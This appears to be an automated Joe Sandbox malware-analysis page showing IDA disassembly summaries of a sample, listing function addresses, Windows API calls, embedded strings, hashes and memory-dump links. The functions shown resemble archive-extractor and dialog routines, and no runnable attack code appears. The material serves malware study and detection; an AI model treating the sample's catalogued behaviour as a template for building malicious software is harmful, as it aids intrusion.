Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 0c5cc7fb6054da433662569884e30769c856d676dda02f2c48fdf19e32a85486
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 2C514769600F4857DF38856C8556BBF67D79B22B04F28081AF883CB6B3C705ED49C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 0012EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 356f7eadfd196780ba9bf3b559d965809184825cf163a9e58fbba1b85d6d750f
Instruction ID: 0249ffde7b3e65c7939ffcd62b6e4d3b065b1b68410348e5f1fd19cdc2c44ef2
Opcode Fuzzy Hash: 356f7eadfd196780ba9bf3b559d965809184825cf163a9e58fbba1b85d6d750f
Instruction Fuzzy Hash: CF51B1315083A58ED716CF24D14046EBFF1AE9A314F5909BDF4D95B243C3219B5ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 001300B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ffc0b36739e07ce0b1b0eff1bfa2fa65d5e6c5b302b2c68ef0ea644a011952
Instruction ID: f48757b1247cfcc2a316c5ef04ccdca371e94d0523f0521a07f786f522d80cd8
Opcode Fuzzy Hash: f3ffc0b36739e07ce0b1b0eff1bfa2fa65d5e6c5b302b2c68ef0ea644a011952
Instruction Fuzzy Hash: 3451EFB1A087159FC748CF19D88055AF7E1FB88314F058A2EE899E3300D734E959CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00133E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 6b487ec2b57129aab208cb4077f49142dc9e81efe9e470c3ae549490c77cb4db
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 813116B1A147568FCB18DF28C85126EBBE0FFA5314F50492DE499D7342C734EA1ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0012E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0012E30E

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

Part of subcall function 00131DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00161030,00000200,0012D928,00000000,?,00000050,00161030), ref: 00131DC4

_strlen.LIBCMT ref: 0012E32F
SetDlgItemTextW.USER32(?,0015E274,?), ref: 0012E38F
GetWindowRect.USER32(?,?), ref: 0012E3C9
GetClientRect.USER32(?,?), ref: 0012E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0012E475
GetWindowRect.USER32(?,?), ref: 0012E4A2
SetWindowTextW.USER32(?,?), ref: 0012E4DB
GetSystemMetrics.USER32(00000008), ref: 0012E4E3
GetWindow.USER32(?,00000005), ref: 0012E4EE
GetWindowRect.USER32(00000000,?), ref: 0012E51B
GetWindow.USER32(00000000,00000002), ref: 0012E58D

Strings

$%s:, xrefs: 0012E302
d, xrefs: 0012E3F5
CAPTION, xrefs: 0012E4BD

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 9174be5a592ea35e8d6eaa10582dff1e215e6803dab4169345505f72c907af89
Instruction ID: 9fe693acb3a3494475acf9c5bba546486bb445ded6b7b667a6b6d2f493889fc3
Opcode Fuzzy Hash: 9174be5a592ea35e8d6eaa10582dff1e215e6803dab4169345505f72c907af89
Instruction Fuzzy Hash: 2681A272508351AFD710DFA8DD89A6FBBE9FB88B04F04091DFA94D7250D730EA458B52

Uniqueness

Uniqueness Score: -1.00%

Function 0014CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0014CB66

Part of subcall function 0014C701: _free.LIBCMT ref: 0014C71E
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C730
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C742
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C754
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C766
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C778
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C78A
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C79C
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C7AE
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C7C0
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C7D2
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C7E4
Part of subcall function 0014C701: _free.LIBCMT ref: 0014C7F6

_free.LIBCMT ref: 0014CB5B

Part of subcall function 00148DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?), ref: 00148DE2
Part of subcall function 00148DCC: GetLastError.KERNEL32(?,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?,?), ref: 00148DF4

_free.LIBCMT ref: 0014CB7D
_free.LIBCMT ref: 0014CB92
_free.LIBCMT ref: 0014CB9D
_free.LIBCMT ref: 0014CBBF
_free.LIBCMT ref: 0014CBD2
_free.LIBCMT ref: 0014CBE0
_free.LIBCMT ref: 0014CBEB
_free.LIBCMT ref: 0014CC23
_free.LIBCMT ref: 0014CC2A
_free.LIBCMT ref: 0014CC47
_free.LIBCMT ref: 0014CC5F

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 409616cd1e090b5578a8977a154d2d780e67aa70e9a46fd91ff15081fec0af70
Instruction ID: b84082dd36e07240e921762362abe2e6a5d730849e98a49ab7def1fc64571e36
Opcode Fuzzy Hash: 409616cd1e090b5578a8977a154d2d780e67aa70e9a46fd91ff15081fec0af70
Instruction Fuzzy Hash: F8317031A023059FEB61AA79D886B5BB7E9EF20350F104429F558D71B2DF31ED40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0013D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0013D6ED

Part of subcall function 00131FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0012C116,00000000,.exe,?,?,00000800,?,?,?,00138E3C), ref: 00131FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0013D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0013D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0013D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0013D75D
DeleteObject.GDI32(00000000), ref: 0013D764
GetWindow.USER32(00000000,00000002), ref: 0013D76D

Strings

STATIC, xrefs: 0013D6F3

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 03e9c9d0a18e478175f0a5784b3126d2c37fb81f5574d8aa315d547f1309330b
Instruction ID: 21ac8b5c74eeb26130deb2296dae5db1d8b28f59fe14d9b6f197c2bf5ed25ca6
Opcode Fuzzy Hash: 03e9c9d0a18e478175f0a5784b3126d2c37fb81f5574d8aa315d547f1309330b
Instruction Fuzzy Hash: D61133722403107BE220ABB0FC4BFAF7A6CAF20F15F044120FA61A60D1DB648F8543B2

Uniqueness

Uniqueness Score: -1.00%

Function 001496F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00149705

Part of subcall function 00148DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?), ref: 00148DE2
Part of subcall function 00148DCC: GetLastError.KERNEL32(?,?,0014C896,?,00000000,?,00000000,?,0014C8BD,?,00000007,?,?,0014CCBA,?,?), ref: 00148DF4

_free.LIBCMT ref: 00149711
_free.LIBCMT ref: 0014971C
_free.LIBCMT ref: 00149727
_free.LIBCMT ref: 00149732
_free.LIBCMT ref: 0014973D
_free.LIBCMT ref: 00149748
_free.LIBCMT ref: 00149753
_free.LIBCMT ref: 0014975E
_free.LIBCMT ref: 0014976C

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 03a6d2b56c0b8624fd2c9df342cfb5830dd522a13f2c8ffdaad4c013e84a3725
Instruction ID: a7f51451656699640f91664f0bc5406e0b30f202aacb1687ceab6be8e5ee7f31
Opcode Fuzzy Hash: 03a6d2b56c0b8624fd2c9df342cfb5830dd522a13f2c8ffdaad4c013e84a3725
Instruction Fuzzy Hash: 53117276911109AFCB01EF94C982CDD3BB5EF24350B5155A5FA088F272DF32EA509B84

Uniqueness

Uniqueness Score: -1.00%

Function 00142E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00142F50
___TypeMatch.LIBVCRUNTIME ref: 0014305E
_UnwindNestedFrames.LIBCMT ref: 001431B0
CallUnexpected.LIBVCRUNTIME ref: 001431CB
_abort.LIBCMT ref: 001431D0

Strings

csm, xrefs: 00142EDB
csm, xrefs: 00142E6E
csm, xrefs: 00142F87

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 2289963cfba89b2bb35809f1c3a84336fd1992f67fb783d940e8d2166eddfca4
Instruction ID: 7535b7b401d98dff149792403bf848c4a6929850d67406cf52bb5c5a9886786d
Opcode Fuzzy Hash: 2289963cfba89b2bb35809f1c3a84336fd1992f67fb783d940e8d2166eddfca4
Instruction Fuzzy Hash: 73B17D71800209EFCF29DFA4C8819AEBBB5FF24710F54415AF8256B222D735DA96CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00126FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00126FAA
_wcslen.LIBCMT ref: 00127013
_wcslen.LIBCMT ref: 00127084

Part of subcall function 00127A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00127AAB
Part of subcall function 00127A9C: GetLastError.KERNEL32 ref: 00127AF1
Part of subcall function 00127A9C: CloseHandle.KERNEL32(?), ref: 00127B00

Strings

\??\, xrefs: 0012702B
SeRestorePrivilege, xrefs: 00126FC2
UNC\, xrefs: 00127051
SeCreateSymbolicLinkPrivilege, xrefs: 00126FCC

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 6e3c3d01a1f324105498f660649be5707b529714a63cb229eef8ec1136c12a8a
Instruction ID: c62374a066918ebb5fdcc622c58185bd051f8cdf4847c1447ad2a1caf41dea52
Opcode Fuzzy Hash: 6e3c3d01a1f324105498f660649be5707b529714a63cb229eef8ec1136c12a8a
Instruction Fuzzy Hash: EE41F5B1D08364BAEB21E770BC82FEF776C9F29344F044455FA55A71C2D770AAA88721

Uniqueness

Uniqueness Score: -1.00%

Function 00139711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00139736
_wcslen.LIBCMT ref: 001397D6
GlobalAlloc.KERNEL32(00000040,?), ref: 001397E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00139806

Strings

</html>, xrefs: 001397B7
<html>, xrefs: 00139755, 0013978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00139760
utf-8"></head>, xrefs: 0013976B

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: edb734c796c690dacbbfffc1e1a4a44cec7a0a00cd1ebb9ce3dac0265c886edc
Instruction ID: 05415f80bcc6d23d413351d252216049c614ddcf36db81b6ad1e7842c5962ec2
Opcode Fuzzy Hash: edb734c796c690dacbbfffc1e1a4a44cec7a0a00cd1ebb9ce3dac0265c886edc
Instruction Fuzzy Hash: 2B318A32109301BBE725AF34DC06FAF779CDF92311F10010EF8119B1D2EBA49A4887A6

Uniqueness

Uniqueness Score: -1.00%

Function 0013B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00121316: GetDlgItem.USER32(00000000,00003021), ref: 0012135A
Part of subcall function 00121316: SetWindowTextW.USER32(00000000,001535F4), ref: 00121370

EndDialog.USER32(?,00000001), ref: 0013B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0013B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0013B650
SetWindowTextW.USER32(?,?), ref: 0013B661
GetDlgItem.USER32(?,00000065), ref: 0013B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0013B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0013B694

Strings

LICENSEDLG, xrefs: 0013B5D4

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 659e813f77c2b01f7c9179a5c83dc268447f780d4b15e647f70dd21e078cee64
Instruction ID: 12f1fb5ccc9a8fe978c0680b61c9f0d10390cd06ffd6aa8ec204b843d332e9db
Opcode Fuzzy Hash: 659e813f77c2b01f7c9179a5c83dc268447f780d4b15e647f70dd21e078cee64
Instruction Fuzzy Hash: BE21F772208204BBD2119F65EC8FF3B3B7DEB46F51F050018F714A68E1EB529A819731

Uniqueness

Uniqueness Score: -1.00%

Function 0013FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,8CDB5CA4,00000001,00000000,00000000,?,?,0012AF6C,ROOT\CIMV2), ref: 0013FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0012AF6C,ROOT\CIMV2), ref: 0013FE14
SysAllocString.OLEAUT32(00000000), ref: 0013FE1F
_com_issue_error.COMSUPP ref: 0013FE48
_com_issue_error.COMSUPP ref: 0013FE52
GetLastError.KERNEL32(80070057,8CDB5CA4,00000001,00000000,00000000,?,?,0012AF6C,ROOT\CIMV2), ref: 0013FE57
_com_issue_error.COMSUPP ref: 0013FE6A
GetLastError.KERNEL32(00000000,?,?,0012AF6C,ROOT\CIMV2), ref: 0013FE80
_com_issue_error.COMSUPP ref: 0013FE93

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 0ed38d281e0e1f27ac9d0fa39fa0dd898db5c4d77557e72f59853943d2acd0ad
Instruction ID: f09f62591d92a2a06b664d3f00e79bb9831986cff2e21bef6b16f5b78c4ee39c
Opcode Fuzzy Hash: 0ed38d281e0e1f27ac9d0fa39fa0dd898db5c4d77557e72f59853943d2acd0ad
Instruction Fuzzy Hash: 3241E771E00319EFCB109FA8CC45BAFBBA8EB48751F11423EF915EB2A1D734994187A5

Uniqueness

Uniqueness Score: -1.00%

Function 0012AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0012AF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 0012AFCA
Name, xrefs: 0012B0B0
Windows 10, xrefs: 0012B0C2
ROOT\CIMV2, xrefs: 0012AF5C
WQL, xrefs: 0012AFDC

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 8b53c0e9340e8290952cfeac46be8972b986f269bacc0d09600ade7d2864b232
Instruction ID: f772b23333207f1c0f0d6d90d5b7fbf7ffc0808c798fdeade2e4f8f0a22904fb
Opcode Fuzzy Hash: 8b53c0e9340e8290952cfeac46be8972b986f269bacc0d09600ade7d2864b232
Instruction Fuzzy Hash: 26719E70A00629EFDB15DFA4DC959AEB7B8FF48311B04015DF522EB6A0CB306D41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00129382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00129387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001293AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001293C9

Part of subcall function 0012C29A: _wcslen.LIBCMT ref: 0012C2A2

Part of subcall function 00131FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0012C116,00000000,.exe,?,?,00000800,?,?,?,00138E3C), ref: 00131FD1

_swprintf.LIBCMT ref: 00129465

Part of subcall function 00124092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001240A5

MoveFileW.KERNEL32(?,?), ref: 001294D4
MoveFileW.KERNEL32(?,?), ref: 00129514

Strings

rtmp%d, xrefs: 0012944E

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
